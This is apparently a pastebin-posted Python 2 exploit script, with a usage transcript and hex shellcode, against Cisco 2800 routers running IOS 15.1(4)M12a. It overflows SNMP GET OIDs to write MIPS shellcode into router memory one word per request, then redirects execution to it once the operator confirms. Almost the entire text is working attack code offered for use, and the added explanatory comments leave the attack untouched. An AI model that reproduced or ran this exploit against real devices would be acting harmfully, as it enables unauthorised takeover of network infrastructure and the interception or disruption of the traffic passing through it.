xB4ckdoorREAL

[CISCO EXPLOIT SHELLCODE]

Nov 4th, 2018
  1. #!/usr/bin/env python
  2. # DISCORD: https://discord.gg/PTW3yPp
# Usage transcript and sample inputs, kept in a string literal under
# `if False:` so the text is parsed but never executed or printed.
if False: '''
 
```
$ sudo python c2800nm-adventerprisek9-mz.151-4.M12a.py 192.168.88.1 public 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
Writing shellcode to 0x8000f000
.
Sent 1 packets.
0x8000f0a4: 8fb40250    lw  $s4, 0x250($sp)
.
Sent 1 packets.
0x8000f0a8: 00000000    nop
.
Sent 1 packets.
0x8000f0ac: 3c163e29    lui $s6, 0x3e29
.
Sent 1 packets.
0x8000f0b0: 36d655b0    ori $s6, $s6, 0x55b0
```
 
 
$ snmpget -v 2c -c public 192.168.88.1 1.3.6.1.2.1.1.1.0
 
SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
```
 
## Shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
 
## unset_shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000003c1480003694f0008e96000000000000aeb60000000000003c1fbfc437ff89a803e0000800000000
'''
  34.  
  35. from scapy.all import *
  36. from time import sleep
  37. from struct import pack, unpack
  38. import random
  39. import argparse
  40. import sys
  41. from termcolor import colored
  42.  
  43.  
# The capstone disassembler is optional: the main block only uses `cs` to
# pretty-print each shellcode word, and it checks `'capstone' in sys.modules`
# before touching it, so a missing package is deliberately tolerated here.
try:
    cs = __import__('capstone')
except ImportError:
    pass
  48.  
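def bin2oid(buf):
    """Render *buf* as dotted-decimal OID arcs, one arc per byte.

    Each byte becomes ``'.<value>'`` so the result can be spliced straight
    into an OID string, e.g. ``b'\\x00\\xff'`` -> ``'.0.255'``; an empty
    input yields ``''``.

    Accepts ``bytes``, ``bytearray`` or a Python 2 ``str``. Iterating via
    ``bytearray`` yields ints on both Python 2 and 3; the previous
    ``unpack('B', x)`` per element only worked on Python 2, because Python 3
    iterates ``bytes`` as ints, which ``unpack`` rejects.
    """
    return ''.join('.' + str(b) for b in bytearray(buf))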
  51.  
def shift(s, offset):
    """Return the 4-byte big-endian word *s* advanced by *offset*.

    *s* is unpacked as an unsigned 32-bit big-endian integer, *offset* is
    added, and the sum is packed back in the same format. A sum outside the
    32-bit range is not masked and makes ``pack`` raise ``struct.error``.
    """
    (word,) = unpack('>I', s)
    return pack('>I', word + offset)
  55.  
  56.  
  57.  
# OID template with twelve positional slots ({0}..{11}). The main block fills
# every slot with a dotted-decimal byte string produced by bin2oid(); the
# fixed prefix sits under the Cisco enterprise arc (1.3.6.1.4.1.9).
alps_oid = '1.3.6.1.4.1.9.9.95.1.3.1.1.7.108.39.84.85.195.249.106.59.210.37.23.42.103.182.75.232.81{0}{1}{2}{3}{4}{5}{6}{7}.14.167.142.47.118.77.96.179.109.211.170.27.243.88.157.50{8}{9}.35.27.203.165.44.25.83.68.39.22.219.77.32.38.6.115{10}{11}.11.187.147.166.116.171.114.126.109.248.144.111.30'
# 4-byte big-endian base address; the main block advances it with shift() by
# 4 per shellcode word and prints it via .encode('hex') (Python 2 only).
shellcode_start = '\x80\x00\xf0\x00'
  60.  
if __name__ == '__main__':
    # NOTE: Python 2 only as written: the print statements, str.decode('hex'),
    # str.encode('hex') and raw_input() all fail under Python 3.
    parser = argparse.ArgumentParser()
    parser.add_argument("host", type=str, help="host IP")
    parser.add_argument("community", type=str, help="community string")
    parser.add_argument("shellcode", action='store', type=str, help='shellcode to run (in hex)')
    args = parser.parse_args()


    # Hex text from the command line -> raw bytes; embedded spaces are dropped
    # first, but any other non-hex character makes decode('hex') raise.
    sh_buf = args.shellcode.replace(' ','').decode('hex')
    print 'Writing shellcode to 0x{}'.format(shellcode_start.encode('hex'))
    # `md` exists only when capstone was imported; the same sys.modules check
    # guards every use of it below.
    if 'capstone' in sys.modules:
        md = cs.Cs(cs.CS_ARCH_MIPS, cs.CS_MODE_MIPS32 | cs.CS_MODE_BIG_ENDIAN)

    # One SNMP GET request per 4-byte word of shellcode. A final chunk shorter
    # than 4 bytes is not padded; bin2oid() simply emits fewer arcs for it.
    for k, sh_dword in enumerate([sh_buf[i:i+4] for i in range(0, len(sh_buf), 4)]):
        # Twelve slot values for alps_oid, in the order {0}..{11} expect them.
        # NOTE(review): the fixed constants below are tied to one firmware
        # build (the transcript above names IOS 15.1(4)M12a); nothing here
        # verifies the target matches before sending.
        s0 = bin2oid(sh_dword)  # shellcode dword
        s1 = bin2oid('\x00\x00\x00\x00')
        s2 = bin2oid('\xBF\xC5\xB7\xDC')
        s3 = bin2oid('\x00\x00\x00\x00')
        s4 = bin2oid('\x00\x00\x00\x00')
        s5 = bin2oid('\x00\x00\x00\x00')
        s6 = bin2oid('\x00\x00\x00\x00')
        ra = bin2oid('\xbf\xc2\x2f\x60') # return control flow jumping over 1 stack frame
        # Address of the k-th word: shellcode_start advanced by 4 bytes per iteration.
        s0_2 = bin2oid(shift(shellcode_start, k * 4))
        ra_2 = bin2oid('\xbf\xc7\x08\x60')
        s0_3 = bin2oid('\x00\x00\x00\x00')
        ra_3 = bin2oid('\xBF\xC3\x86\xA0')

        payload = alps_oid.format(s0, s1, s2, s3, s4, s5, s6, ra, s0_2, ra_2, s0_3, ra_3)

        # send() is fire-and-forget: no reply is read, so scapy's
        # "Sent 1 packets." line is not evidence that the request had any effect.
        send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))

        # Display address: word address plus 0xa4, the same offset the final
        # "jump" request below targets.
        cur_addr = unpack(">I",shift(shellcode_start, k * 4 + 0xa4))[0]
        if 'capstone' in sys.modules:
            for i in md.disasm(sh_dword, cur_addr):
                color = 'green'
                print("0x%x:\t%s\t%s\t%s" %(i.address, sh_dword.encode('hex'), colored(i.mnemonic, color), colored(i.op_str, color)))
        else:
            print("0x%x:\t%s" %(cur_addr, sh_dword.encode('hex')))

        # Fixed 1 s pause between requests.
        sleep(1)

    # Only the literal answer 'yes' continues; any other input (including a
    # bare Enter, despite the "[yes]" hint) ends the script without the final send.
    ans = raw_input("Jump to shellcode? [yes]: ")

    if ans == 'yes':
        ra = bin2oid(shift(shellcode_start, 0xa4)) # return control flow jumping over 1 stack frame
        zero = bin2oid('\x00\x00\x00\x00')
        payload = alps_oid.format(zero, zero, zero, zero, zero, zero, zero, ra, zero, zero, zero, zero)
        send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
        # Printed unconditionally after the send; no response is checked.
        print 'Jump taken!'